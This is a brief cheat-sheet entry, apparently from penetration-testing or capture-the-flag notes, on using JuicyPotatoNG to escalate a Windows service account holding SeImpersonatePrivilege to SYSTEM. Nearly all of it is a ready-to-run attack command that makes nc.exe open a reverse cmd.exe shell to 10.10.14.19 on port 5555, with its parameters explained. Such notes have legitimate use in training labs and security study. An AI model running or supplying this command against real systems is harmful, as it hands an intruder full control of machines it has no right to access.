Just another Windows Local Privilege Escalation from Service Account to System. Requires ‘whoami /priv’ SeImpersonatePrivilege.
Command Reference:
-t createprocess call: both (*)
-p <program>: nc.exe
-a <argument>: 10.10.14.19 5555 -e cmd.exe
JuicyPotatoNG.exe -t * -p "nc.exe" -a "10.10.14.19 5555 -e cmd.exe"
SeImpersonatePrivilege Impersonate a client after authentication Enabled